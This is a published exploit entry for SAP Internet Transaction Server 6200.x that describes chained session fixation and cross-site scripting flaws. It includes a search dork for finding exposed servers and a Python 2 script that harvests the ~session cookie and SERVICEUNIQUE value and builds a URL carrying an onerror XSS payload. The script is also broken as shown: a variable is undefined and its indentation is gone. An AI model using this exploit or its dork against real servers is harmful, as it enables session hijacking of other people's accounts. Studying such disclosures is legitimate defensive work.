SAP Internet Transaction Server 6200.x Session Fixation / Cross Site Scripting

SAP Internet Transaction Server 6200.x suffers from session fixation and cross site scripting vulnerabilities.

MD5 | 5f425a0378b0023e63a4376f5f7c1283

# Exploit Title: SAP Internet Transaction Server (ITS) 6200.X.X - Session Fixation/ Cross-Site Scripting
# Dork: /scripts/wgate/
# Date: 25.05.2018
# Exploit Author: J. Carrillo Lencina (0xd0m7)
# Vendor Homepage:
# Version: SAP ITS 6200.X.X
# Category: Webapps
# Tested on: All Platforms
# CVE:
# Description:As it has been determined that there are two
vulnerabilities in the latest developed version of SAP ITS, these two
vulnerabilities added together give rise to an XSS.

#Technical details: It has been determined that when an unauthenticated
user navigates through the application, the application assigns a cookie,
that cookie is assigned in the parameter ~ session, therefore it could be
possible for an attacker to fix the fallo ~ session through a request GET
This, together with the fact that the parameter SERVICEUNIQUE has a
parameter validation failure, results in a single-use XSS, since the
session expires once the method of the request is exchanged and fixed in
the URL.

import argparse
import requests
import re

parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="Example:!")
args = parser.parse_args()
cookie={'s_fid':'3B9C1B379A11790F-00A298287FA44BF5','s_lv':'1524222141316', 's_nr':'1524222141322-New', 's_vnum':'1555758141333%26vn%3D1'}

if args.url:
r = requests.get(args.url,verify=False,cookies=cookie)
header = r.headers['Set-Cookie']
cookie_val = header.split(";")

for line in r.iter_lines():
if line.find('~SERVICEUNIQUE') > 0:
param = line.replace('"','')
v = param.split('=')
val0 = v[3].split(' ')
print '[+]Random Value:',val0[0]

for line2 in range(len(cookie_val)):
if cookie_val[line2].find('~session') == 0:
val1 = cookie_val[line2].split('=')
print '[+]Session Value:',val1[1]
print '[+] Vulnerable URL:'+url2+val0[0]+'%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e/?%7ESERVICEUNIQUE='+val0[0]+'%3cimg%20src%3da%20onerror%3dalert(1)%3e&%7Eclientinput=1&%7Elogininput=1&%7Epasswdinput=1&%7Eclient=100&%7Elogin=%3F&%7Epassword=aaaaa&%7EPOV=P&%7EOkCode%3D%2F0=Entrar&~session='+val1[1]

print '[!] Empty URL, please see help (-h,--help)'

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